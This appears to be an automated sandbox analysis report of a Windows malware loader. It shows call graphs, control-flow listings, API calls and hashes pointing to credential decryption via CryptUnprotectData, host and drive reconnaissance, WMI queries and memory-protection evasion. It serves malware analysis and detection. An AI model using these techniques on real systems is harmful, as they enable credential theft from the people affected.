LdrInitializeThunk 19787->19795 19789 437b51 19789->19784 19791->19789 19792 437a04 19791->19792 19794 43c330 LdrInitializeThunk 19791->19794 19792->19789 19796 43c330 LdrInitializeThunk 19792->19796 19794->19791 19795->19787 19796->19792 19580 4272d0 19581 4272f0 19580->19581 19584 42734e 19581->19584 19588 43c330 LdrInitializeThunk 19581->19588 19582 42776f 19584->19582 19586 42743e 19584->19586 19589 43c330 LdrInitializeThunk 19584->19589 19590 43a940 19586->19590 19588->19584 19589->19586 19591 43a953 19590->19591 19592 43a955 19590->19592 19591->19582 19593 43a95a RtlFreeHeap 19592->19593 19593->19582 19594 4214d0 19595 4214de 19594->19595 19599 421530 19594->19599 19595->19595 19600 4215f0 19595->19600 19601 421600 19600->19601 19601->19601 19604 43e5d0 19601->19604 19603 4216df 19605 43e5f0 19604->19605 19606 43e71e 19605->19606 19608 43c330 LdrInitializeThunk 19605->19608 19606->19603 19608->19606 19614 43c2d0 19615 43c2f6 19614->19615 19616 43c315 19614->19616 19617 43c2e8 19614->19617 19620 43c30a 19614->19620 19619 43c2fb RtlReAllocateHeap 19615->19619 19618 43a940 RtlFreeHeap 19616->19618 19617->19615 19617->19616 19618->19620 19619->19620 19797 11c44c7 19798 11c44d0 19797->19798 19805 11c4a55 IsProcessorFeaturePresent 19798->19805 19802 11c44e5 19803 11c44e1 19803->19802 19815 11c4f4d 19803->19815 19806 11c44dc 19805->19806 19807 11c4f2e 19806->19807 19821 11c5561 19807->19821 19810 11c4f37 19810->19803 19812 11c4f3f 19813 11c4f4a 19812->19813 19835 11c559d 19812->19835 19813->19803 19816 11c4f56 19815->19816 19817 11c4f60 19815->19817 19818 11c5546 ___vcrt_uninitialize_ptd 6 API calls 19816->19818 19817->19802 19819 11c4f5b 19818->19819 19820 11c559d ___vcrt_uninitialize_locks DeleteCriticalSection 19819->19820 19820->19817 19823 11c556a 19821->19823 19824 11c5593 19823->19824 19826 11c4f33 19823->19826 19839 11c57dd 19823->19839 19825 11c559d ___vcrt_uninitialize_locks DeleteCriticalSection 19824->19825 19825->19826 19826->19810 19827 11c5513 19826->19827 19856 11c56ee 19827->19856 19832 11c5543 19832->19812 19834 11c5528 19834->19812 19836 11c55c7 19835->19836 19837 11c55a8 19835->19837 19836->19810 19838 11c55b2 DeleteCriticalSection 19837->19838 19838->19836 19838->19838 19844 11c5603 19839->19844 19842 11c5815 InitializeCriticalSectionAndSpinCount 19843 11c5800 19842->19843 19843->19823 19845 11c5620 19844->19845 19848 11c5624 19844->19848 19845->19842 19845->19843 19846 11c568c GetProcAddress 19846->19845 19848->19845 19848->19846 19849 11c567d 19848->19849 19851 11c56a3 LoadLibraryExW 19848->19851 19849->19846 19850 11c5685 FreeLibrary 19849->19850 19850->19846 19852 11c56ea 19851->19852 19853 11c56ba GetLastError 19851->19853 19852->19848 19853->19852 19854 11c56c5 ___vcrt_FlsSetValue 19853->19854 19854->19852 19855 11c56db LoadLibraryExW 19854->19855 19855->19848 19857 11c5603 ___vcrt_FlsSetValue 5 API calls 19856->19857 19858 11c5708 19857->19858 19859 11c5721 TlsAlloc 19858->19859 19860 11c551d 19858->19860 19860->19834 19861 11c579f 19860->19861 19862 11c5603 ___vcrt_FlsSetValue 5 API calls 19861->19862 19863 11c57b9 19862->19863 19864 11c57d4 TlsSetValue 19863->19864 19865 11c5536 19863->19865 19864->19865 19865->19832 19866 11c5546 19865->19866 19867 11c5556 19866->19867 19868 11c5550 19866->19868 19867->19834 19870 11c5729 19868->19870 19871 11c5603 ___vcrt_FlsSetValue 5 API calls 19870->19871 19872 11c5743 19871->19872 19873 11c575b TlsFree 19872->19873 19874 11c574f 19872->19874 19873->19874 19874->19867 19875 41729c 19877 4172a0 19875->19877 19876 417451 CryptUnprotectData 19877->19876 19878 40d120 19882 409600 19878->19882 19880 40d133 CoUninitialize 19881 40d160 19880->19881 19883 409614 19882->19883 19883->19880 19883->19883 19626 43cd62 19627 43cd90 19626->19627 19630 43cdce 19627->19630 19633 43c330 LdrInitializeThunk 19627->19633 19628 43ce5e 19630->19628 19632 43c330 LdrInitializeThunk 19630->19632 19632->19628 19633->19630 19634 434ee2 19635 434f1e 19634->19635 19637 434fa6 19635->19637 19638 43c330 LdrInitializeThunk 19635->19638 19638->19635 19639 43f5e0 19640 43f5ef 19639->19640 19644 43f76e 19640->19644 19647 43c330 LdrInitializeThunk 19640->19647 19641 43f99d 19643 43f8de 19645 43a940 RtlFreeHeap 19643->19645 19644->19641 19644->19643 19648 43c330 LdrInitializeThunk 19644->19648 19645->19641 19647->19644 19648->19643 19884 423a2a 19886 423a33 19884->19886 19885 423a64 19886->19885 19887 43e5d0 LdrInitializeThunk 19886->19887 19889 423b66 19887->19889 19888 423cf1 GetLogicalDrives 19890 43e5d0 LdrInitializeThunk 19888->19890 19889->19888 19889->19889 19890->19885 19891 43a92b RtlAllocateHeap 19649 40dce9 19651 40dd70 19649->19651 19650 40ddce 19651->19650 19653 43c330 LdrInitializeThunk 19651->19653 19653->19650 19892 43c5af GetForegroundWindow 19896 43e240 19892->19896 19894 43c5bb GetForegroundWindow 19895 43c5cc 19894->19895 19897 43e250 19896->19897 19897->19894 19654 aff080 19655 aff090 19654->19655 19670 aff138 19654->19670 19655->19670 19674 afeed0 19655->19674 19660 aff10d 19661 aff11f 19660->19661 19662 aff15e 19660->19662 19664 afeed0 GetPEB 19661->19664 19663 afeed0 GetPEB 19662->19663 19665 aff173 19663->19665 19666 aff132 19664->19666 19667 afebf0 GetPEB 19665->19667 19668 afebf0 GetPEB 19666->19668 19669 aff179 19667->19669 19668->19670 19669->19670 19671 afeed0 GetPEB 19669->19671 19672 aff19b 19671->19672 19673 afebf0 GetPEB 19672->19673 19673->19670 19675 aff01c 19674->19675 19701 afeb50 GetPEB 19675->19701 19677 aff049 19678 afeed0 GetPEB 19677->19678 19679 aff064 19677->19679 19680 aff05e 19678->19680 19682 afebf0 19679->19682 19681 afebf0 GetPEB 19680->19681 19681->19679 19683 afedcd NtAllocateVirtualMemory 19682->19683 19684 afec03 19682->19684 19683->19660 19683->19670 19684->19683 19685 afeed0 GetPEB 19684->19685 19686 afed9f 19685->19686 19687 afebf0 GetPEB 19686->19687 19688 afeda5 19687->19688 19689 afeddf 19688->19689 19690 afedbb 19688->19690 19691 afeed0 GetPEB 19689->19691 19692 afeed0 GetPEB 19690->19692 19693 afedeb 19691->19693 19694 afedc7 19692->19694 19695 afebf0 GetPEB 19693->19695 19696 afebf0 GetPEB 19694->19696 19697 afedf1 19695->19697 19696->19683 19698 afeed0 GetPEB 19697->19698 19699 afee00 19698->19699 19700 afebf0 GetPEB 19699->19700 19700->19683 19702 afeb7c 19701->19702 19702->19677 19898 aff5c0 19899 afeed0 GetPEB 19898->19899 19900 aff5e8 19899->19900 19901 afebf0 GetPEB 19900->19901 19902 aff5ee NtProtectVirtualMemory 19901->19902 19905 aff61d 19902->19905 19903 aff70c 19904 afeed0 GetPEB 19904->19905 19905->19903 19905->19904 19906 afebf0 GetPEB 19905->19906 19907 aff6ee NtProtectVirtualMemory 19906->19907 19907->19905 19703 4105f3 19705 41060d 19703->19705 19706 40edbb 19705->19706 19707 414c00 19705->19707 19708 414c20 19707->19708 19708->19708 19711 43e430 19708->19711 19710 414d51 19713 43e450 19711->19713 19712 43e57e 19712->19710 19713->19712 19715 43c330 LdrInitializeThunk 19713->19715 19715->19712 19716 43a970 19717 43a990 19716->19717 19719 43a9ee 19717->19719 19724 43c330 LdrInitializeThunk 19717->19724 19721 43abd1 19719->19721 19723 43aaee 19719->19723 19725 43c330 LdrInitializeThunk 19719->19725 19720 43a940 RtlFreeHeap 19720->19721 19723->19720 19724->19719 19725->19723 19726 40a573 19727 40a588 19726->19727 19730 40a8c0 19727->19730 19733 40a8f0 19730->19733 19731 40a591 19732 43a940 RtlFreeHeap 19732->19731 19733->19731 19733->19732 19734 40c5f5 CoInitializeSecurity 19735 43c7fb 19737 43c840 19735->19737 19736 43c99e 19737->19736 19739 43c330 LdrInitializeThunk 19737->19739 19739->19736 19908 4322b8 19911 414160 19908->19911 19910 4322bd CoSetProxyBlanket 19911->19910 19912 40c63c 19913 40c650 19912->19913 19918 437bc0 19913->19918 19915 40c6c9 19916 437bc0 11 API calls 19915->19916 19917 40caf9 19916->19917 19919 437bf0 CoCreateInstance 19918->19919 19921 437df3 SysAllocString 19919->19921 19922 438205 19919->19922 19925 437e6f 19921->19925 19923 438215 GetVolumeInformationW 19922->19923 19932 43822c 19923->19932 19926 4381f1 SysFreeString 19925->19926 19927 437e7e CoSetProxyBlanket 19925->19927 19926->19922 19928 4381e7 19927->19928 19929 437e9e SysAllocString 19927->19929 19928->19926 19931 437f70 19929->19931 19931->19931 19933 437fbb SysAllocString 19931->19933 19932->19915 19935 437fe2 19933->19935 19934 4381d2 SysFreeString SysFreeString 19934->19928 19935->19934 19936 4381c8 19935->19936 19937 43802d VariantInit 19935->19937 19936->19934 19939 438080 19937->19939 19938 4381b7 VariantClear 19938->19936 19939->19938 19740 42db7f 19741 42dba3 19740->19741 19742 42dc5b FreeLibrary 19741->19742 19743 42dc6e 19742->19743 19744 42dc7e GetComputerNameExA 19743->19744 19746 42dcd0 GetComputerNameExA 19744->19746 19747 42dda0 19746->19747 19940 43ccbd 19941 43cce0 19940->19941 19944 43c330 LdrInitializeThunk 19941->19944 19943 43cd58 19944->19943

                                                                                        Executed Functions

                                                                                        Function 00437BC0 Relevance: 35.6, APIs: 11, Strings: 9, Instructions: 639memorycomCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 437bc0-437bea 1 437bf0-437c27 0->1 1->1 2 437c29-437c3f 1->2 3 437c40-437c76 2->3 3->3 4 437c78-437cb6 3->4 5 437cc0-437d1f 4->5 5->5 6 437d21-437d40 5->6 8 437d42 6->8 9 437d4d-437d58 6->9 8->9 10 437d60-437d8e 9->10 10->10 11 437d90-437ded CoCreateInstance 10->11 12 437df3-437e24 11->12 13 438205-43822a call 43dd00 GetVolumeInformationW 11->13 15 437e30-437e44 12->15 18 438234-438236 13->18 19 43822c-438230 13->19 15->15 17 437e46-437e78 SysAllocString 15->17 22 4381f1-438201 SysFreeString 17->22 23 437e7e-437e98 CoSetProxyBlanket 17->23 21 43824d-438258 18->21 19->18 24 438264-43827f 21->24 25 43825a-438261 21->25 22->13 26 4381e7-4381ed 23->26 27 437e9e-437eb3 23->27 28 438280-4382cf 24->28 25->24 26->22 29 437ec0-437ee5 27->29 28->28 30 4382d1-438302 28->30 29->29 31 437ee7-437f63 SysAllocString 29->31 32 438310-438334 30->32 33 437f70-437fb9 31->33 32->32 34 438336-438364 call 41e560 32->34 33->33 36 437fbb-437feb SysAllocString 33->36 38 438370-438378 34->38 41 4381d2-4381e4 SysFreeString * 2 36->41 42 437ff1-438013 36->42 38->38 40 43837a-43837c 38->40 43 438382-438392 call 407f20 40->43 44 438240-438247 40->44 41->26 49 438019-43801c 42->49 50 4381c8-4381ce 42->50 43->44 44->21 46 438397-43839e 44->46 49->50 51 438022-438027 49->51 50->41 51->50 52 43802d-43807f VariantInit 51->52 53 438080-4380b2 52->53 53->53 54 4380b4-4380c6 53->54 55 4380ca-4380d3 54->55 56 4381b7-4381c4 VariantClear 55->56 57 4380d9-4380df 55->57 56->50 57->56 58 4380e5-4380f3 57->58 59 4380f5-4380fa 58->59 60 43812d 58->60 61 43810c-438110 59->61 62 43812f-43816d call 407ea0 call 408cf0 60->62 64 438112-43811b 61->64 65 438100 61->65 73 4381a6-4381b3 call 407eb0 62->73 74 43816f-438185 62->74 68 438122-438126 64->68 69 43811d-438120 64->69 67 438101-43810a 65->67 67->61 67->62 68->67 71 438128-43812b 68->71 69->67 71->67 73->56 74->73 75 438187-43819d 74->75 75->73 77 43819f-4381a2 75->77 77->73
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00437DE2
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00437E47
                                                                                        • CoSetProxyBlanket.COMBASE(680742DE,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437E90
                                                                                        • SysAllocString.OLEAUT32(?), ref: 00437EE8
                                                                                        • SysAllocString.OLEAUT32(F9BDF745), ref: 00437FC0
                                                                                        • VariantInit.OLEAUT32(?), ref: 00438032
                                                                                        • VariantClear.OLEAUT32(?), ref: 004381B8
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004381DC
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004381E2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: String$Alloc$FreeVariant$BlanketClearCreateInitInstanceProxy
                                                                                        • String ID: Z>\$/^&P$/^&PZ>\$0R/T$C$Gx$Ljkl$ab$pyz{
                                                                                        • API String ID: 3490847348-109390196
                                                                                        • Opcode ID: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
                                                                                        • Instruction ID: 8131ac09c1f2c8c7a662361a942698708379fad2ab2868bed6bea96b7e7f230e
                                                                                        • Opcode Fuzzy Hash: b231c181ff8d6da98a5bc272ab21cfc30071d9d7bfb85af6a5a038700ba4b8a6
                                                                                        • Instruction Fuzzy Hash: 2312DEB2A083519BD720CF68C88475BFBE1EBC9714F194A2DF9D497390D778D8058B86
                                                                                        Function 004105F3 Relevance: 15.8, Strings: 12, Instructions: 815COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 79 4105f3-41060b 80 41060d-410610 79->80 81 410612-410635 80->81 82 410637-410666 call 401860 80->82 81->80 85 410668-41066b 82->85 86 4106a4-4106cb call 401860 85->86 87 41066d-4106a2 85->87 90 4106cd-410700 call 413d50 86->90 91 4106cf 86->91 87->85 98 410702 90->98 99 410704-41074e call 407ea0 call 40a630 90->99 93 4111a1 91->93 94 411c0f-411c16 93->94 97 411c18-411c27 call 401f20 94->97 106 40edc7-411c38 97->106 107 40edce-40edf4 call 401f30 97->107 98->99 111 410755-410758 99->111 115 40edf6-40edf9 107->115 113 4107b7-4107d7 call 401860 111->113 114 41075a-4107b5 111->114 122 410832-41085f call 413d50 113->122 123 4107d9-4107fc call 413d50 113->123 114->111 117 40edfb-40ee2d 115->117 118 40ee2f-40ee5b call 401e20 115->118 117->115 124 40ee5d-40ee7c 118->124 125 40ee5f 118->125 132 410861 122->132 133 410863-410903 call 407ea0 call 40a630 122->133 134 410800-41082b call 407ea0 call 40a630 123->134 135 4107fe 123->135 131 40ee7e-40ee81 124->131 125->97 137 40ee83-40ee98 131->137 138 40ee9a-40eeee call 401960 131->138 132->133 150 410905-410908 133->150 134->122 135->134 137->131 138->94 147 40eef4 138->147 147->94 151 41090a-41097d 150->151 152 41097f-410991 150->152 151->150 153 410993-4109a6 call 407eb0 152->153 154 4109ab-4109c4 152->154 163 41119f 153->163 156 4109c6 154->156 157 4109c8-410a23 call 407ea0 154->157 156->157 165 410a50-410a7f call 407eb0 157->165 166 410a25-410a4b call 407eb0 * 2 157->166 163->93 176 410a81-410a84 165->176 186 41119d 166->186 178 410ab7-410ad7 call 401860 176->178 179 410a86-410ab5 176->179 184 410ad9-410b00 call 413d50 178->184 185 410b2d-410b45 178->185 179->176 192 410b02 184->192 193 410b04-410b28 call 407ea0 call 40a630 184->193 188 410b47-410b4a 185->188 186->163 190 410bb3-410bf5 call 401b70 188->190 191 410b4c-410bb1 188->191 197 410bf7-410bfa 190->197 191->188 192->193 193->185 199 410c00-410c7e 197->199 200 410c83-410caa call 401a70 197->200 199->197 204 410cb0-410cef call 414160 call 401f20 200->204 205 411078-4110ee call 408a20 call 414c00 200->205 215 410cf1 204->215 216 410cf3-410d18 call 407ea0 204->216 212 4110f3-411102 call 409600 205->212 219 411133-411163 call 407eb0 * 2 212->219 220 411104-411117 212->220 215->216 225 410d41-410d43 216->225 226 410d1a-410d21 216->226 251 411165-411174 call 407eb0 219->251 252 411176-41117e 219->252 223 411119 220->223 224 41112b-41112e call 407eb0 220->224 229 41111b-411127 call 413ff0 223->229 224->219 228 410d45-410d47 225->228 232 410d23-410d2f call 413e70 226->232 234 410d49 228->234 235 410d4e-410d92 call 401f30 228->235 244 411129 229->244 245 410d31-410d3f 232->245 234->205 247 410d99-410d9c 235->247 244->224 245->225 249 410da2-410e56 247->249 250 410e5b-410e95 call 401860 247->250 249->247 261 410e97-410e9a 250->261 251->252 255 411180-41118a call 407eb0 252->255 256 41118f-41119b call 408b00 252->256 255->256 256->186 262 410eb3-410ef8 call 401860 261->262 263 410e9c-410eb1 261->263 267 410efa-410efd 262->267 263->261 268 410f6c-410fb7 call 401b70 267->268 269 410eff-410f6a 267->269 272 410fb9-410fbc 268->272 269->267 273 410fff-411073 call 401b70 call 413e90 272->273 274 410fbe-410ffd 272->274 273->228 274->272
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $$($($-$A$G$I$N$X$l$n${
                                                                                        • API String ID: 0-3018408179
                                                                                        • Opcode ID: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
                                                                                        • Instruction ID: 45de6dd5686d3479f9f5989f6b87c12e9a5a75427f0c78b35cf7a0a625548742
                                                                                        • Opcode Fuzzy Hash: 5e103353c0778339808f6a7ca294803b546d41d14dbeded6291cd10cad3a3d9b
                                                                                        • Instruction Fuzzy Hash: 4462D372A0D7908BC3249B3984853DFBBD2ABC5314F198A3ED9D9D73C1D67889818B47
                                                                                        Function 00421A80 Relevance: 14.3, Strings: 11, Instructions: 597COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 279 421a80-421acd call 43e430 282 421ad4-421b4f call 414140 call 43a910 279->282 283 421acf 279->283 289 421b51-421b54 282->289 284 422301-422311 283->284 290 421bb2-421bb6 289->290 291 421b56-421bb0 289->291 292 421bb8-421bc3 290->292 291->289 293 421bc5 292->293 294 421bca-421be3 292->294 295 421c82-421c85 293->295 296 421be5 294->296 297 421bea-421bf5 294->297 300 421c87 295->300 301 421c89-421c8e 295->301 298 421c71-421c76 296->298 297->298 299 421bf7-421c67 call 43c330 297->299 303 421c7a-421c7d 298->303 304 421c78 298->304 307 421c6c 299->307 300->301 305 421c94-421ca4 301->305 306 4221f9-422237 call 43a940 301->306 303->292 304->295 308 421ca6-421cc6 305->308 315 422239-42223c 306->315 307->298 310 421e8e 308->310 311 421ccc-421ced 308->311 313 421e90-421e93 310->313 314 421cf1-421cf4 311->314 316 421e95-421e99 313->316 317 421e9b-421eac call 43a910 313->317 318 421d30-421d4e call 422320 314->318 319 421cf6-421d2e 314->319 320 42229a-4222a0 315->320 321 42223e-422298 315->321 324 421ec2-421ec4 316->324 337 421ebe-421ec0 317->337 338 421eae-421eb9 317->338 318->310 332 421d54-421d7d 318->332 319->314 323 4222a2-4222a8 320->323 321->315 327 4222aa 323->327 328 4222ac-4222be 323->328 330 4221d2-4221d7 324->330 331 421eca-421eef 324->331 327->284 333 4222c2-4222c8 328->333 334 4222c0 328->334 335 4221e3-4221e7 330->335 336 4221d9-4221e1 330->336 339 421ef3-421ef6 331->339 340 421d7f-421d82 332->340 341 4222f1-4222f4 333->341 342 4222ca-4222ef call 43c330 333->342 334->341 343 4221e9 335->343 336->343 337->324 344 4221eb-4221ef 338->344 345 421ef8-421f57 339->345 346 421f59-421f94 339->346 348 421d84-421dcc 340->348 349 421dce-421de5 call 422320 340->349 352 4222f6-4222f8 341->352 353 4222fa-4222ff 341->353 342->341 343->344 344->308 351 4221f5-4221f7 344->351 345->339 347 421f96-421f99 346->347 354 421ff7-421ffd 347->354 355 421f9b-421ff5 347->355 348->340 363 421de7 349->363 364 421dec-421e03 349->364 351->306 352->284 353->323 359 422001-42200c 354->359 355->347 361 422013-422035 359->361 362 42200e 359->362 366 422037-422039 361->366 367 42203e-422050 361->367 365 4220f2-4220f5 362->365 363->313 368 421e07-421e8c call 407ea0 call 413db0 call 407eb0 364->368 369 421e05 364->369 370 4220f7 365->370 371 4220f9-422118 365->371 372 4220da-4220e6 366->372 367->372 373 422056-4220d0 call 43c330 367->373 368->313 369->368 370->371 375 42211a-42211d 371->375 377 4220ea-4220ed 372->377 378 4220e8 372->378 382 4220d5 373->382 380 42216a-422170 375->380 381 42211f-422168 375->381 377->359 378->365 384 422172-422176 380->384 385 4221a0-4221ac 380->385 381->375 382->372 387 422178-42217f 384->387 388 4221ae-4221bd call 43a940 385->388 389 4221bf-4221c1 385->389 392 422191-422194 387->392 393 422181-42218f 387->393 391 4221c3-4221c6 388->391 389->391 391->330 396 4221c8-4221d0 391->396 398 422196 392->398 399 42219c-42219e 392->399 393->387 396->344 398->399 399->385
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: !@$,$/$5$6$B$D$k$m$n$o
                                                                                        • API String ID: 0-3097700080
                                                                                        • Opcode ID: e9b4c7f56e078db1dc93f1a691f4ce93547a1584786ce6f13b527817904f49de
                                                                                        • Instruction ID: dc28331636f64223628dcf67653152bfe71e102bd96d9b605168d7f034e00d79
                                                                                        • Opcode Fuzzy Hash: e9b4c7f56e078db1dc93f1a691f4ce93547a1584786ce6f13b527817904f49de
                                                                                        • Instruction Fuzzy Hash: DD32F17170C7908FD3248B28D49136FBBE1ABD9314F58892EE5D6873D2D6BD8841874B
                                                                                        Function 0042DB7F Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 498COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 411 42db7f-42dbd3 call 43dd00 415 42dbe0-42dbfa 411->415 415->415 416 42dbfc-42dc09 415->416 417 42dc2b-42dc38 416->417 418 42dc0b-42dc12 416->418 419 42dc3a-42dc41 417->419 420 42dc5b-42dccf FreeLibrary call 43dd00 GetComputerNameExA 417->420 421 42dc20-42dc29 418->421 422 42dc50-42dc59 419->422 426 42dcd0-42dcf6 420->426 421->417 421->421 422->420 422->422 426->426 427 42dcf8-42dd02 426->427 428 42dd04-42dd0f 427->428 429 42dd1d 427->429 430 42dd10-42dd19 428->430 431 42dd20-42dd2d 429->431 430->430 432 42dd1b 430->432 433 42dd4b-42dd9f GetComputerNameExA 431->433 434 42dd2f-42dd36 431->434 432->431 436 42dda0-42ddbb 433->436 435 42dd40-42dd49 434->435 435->433 435->435 436->436 437 42ddbd-42ddc7 436->437 438 42dddb-42dde8 437->438 439 42ddc9 437->439 441 42ddea-42ddf1 438->441 442 42de0b-42de5a 438->442 440 42ddd0-42ddd9 439->440 440->438 440->440 443 42de00-42de09 441->443 445 42de60-42de96 442->445 443->442 443->443 445->445 446 42de98-42dea2 445->446 447 42dea4-42deab 446->447 448 42debb-42dec8 446->448 449 42deb0-42deb9 447->449 450 42deca-42ded1 448->450 451 42deeb-42df47 call 43dd00 448->451 449->448 449->449 452 42dee0-42dee9 450->452 456 42df50-42df9c 451->456 452->451 452->452 456->456 457 42df9e-42dfa8 456->457 458 42dfaa-42dfb1 457->458 459 42dfcb-42dfe5 457->459 460 42dfc0-42dfc9 458->460 461 42e10a-42e14a 459->461 462 42dfeb-42dff2 459->462 460->459 460->460 464 42e150-42e1a2 461->464 463 42e000-42e00a 462->463 465 42e020-42e026 463->465 466 42e00c-42e011 463->466 464->464 467 42e1a4-42e1b5 464->467 469 42e050-42e05c 465->469 470 42e028-42e02b 465->470 468 42e0b0-42e0b9 466->468 471 42e1b7-42e1c5 467->471 472 42e1dd 467->472 478 42e0bb-42e0c1 468->478 475 42e05e-42e061 469->475 476 42e0cd-42e0d5 469->476 470->469 473 42e02d-42e042 470->473 474 42e1d0-42e1d9 471->474 477 42e1e4-42e1e7 call 4309d0 472->477 473->468 474->474 482 42e1db 474->482 475->476 483 42e063-42e0a5 475->483 480 42e0d7-42e0dc 476->480 481 42e0de-42e0e1 476->481 485 42e1ec-42e20c 477->485 478->461 479 42e0c3-42e0c5 478->479 479->463 486 42e0cb 479->486 480->478 487 42e0e3-42e104 481->487 488 42e106-42e108 481->488 482->477 483->468 486->461 487->468 488->468
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?), ref: 0042DC68
                                                                                        • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0042DCA2
                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0042DD66
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.2711152065.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.2711128299.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711188320.0000000000440000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711209643.0000000000443000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.2711231008.0000000000454000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_Loader.jbxd
                                                                                        Similarity
                                                                                        • API ID: ComputerName$FreeLibrary
                                                                                        • String ID: _$uHHs
                                                                                        • API String ID: 2243422189-2879388440
                                                                                        • Opcode ID: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                        • Instruction ID: 657a4d5abfb12f1dc895d1f067591f20c39952d2f974751b242cefe10b9506bf
                                                                                        • Opcode Fuzzy Hash: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                        • Instruction Fuzzy Hash: 24D1D3606187E08AD7358F3994A07BBBBD1AFA7304F5849AED4C98B382C7394505CB57
                                                                                        Function 00423A2A Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 400COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 489 423a2a-423a31 490 423a33-423a38 489->490 491 423a3a 489->491 492 423a3d-423a5d call 407ea0 490->492 491->492 496 423a64 492->496 497 423a7c-423a83 492->497 498 423a6c-423a77 call 407eb0 492->498 496->498 500 423a85-423a8a 497->500 501 423a8c 497->501 504 423f92-423f9b 498->504 503 423a93-423acf call 407ea0 500->503 501->503 507 423ad0-423afa 503->507 507->507 508 423afc-423b05 507->508 509 423b21-423b2f 508->509 510 423b07-423b0f 508->510 512 423b53 509->512 513 423b31-423b37 509->513 511 423b10-423b1f 510->511 511->509 511->511 515 423b56-423b61 call 43e5d0 512->515 514 423b40-423b4f 513->514 514->514 516 423b51 514->516 518 423b66-423b6e 515->518 516->515 519 423b83-423b90 518->519 520 423b75-423b7a 518->520 521 423b92-423b97 519->521 522 423b99 519->522 520->519 523 423ba0-423c37 call 407ea0 521->523 522->523 526 423c40-423c8f 523->526 526->526 527 423c91-423c9f 526->527 528 423cc1-423cd2 527->528 529 423ca1-423ca6 527->529 531 423cf1-423d10 GetLogicalDrives call 43e5d0 528->531 532 423cd4-423cd7 528->532 530 423cb0-423cbf 529->530 530->528 530->530 531->504 536 423f62 531->536 537 423d30-423d38 call 407eb0 531->537 538 423f90 531->538 539 423d41 531->539 540 423d27 531->540 541 423d17-423d1f 531->541 542 423f68-423f70 call 407eb0 531->542 543 4240d8-4240de 531->543 544 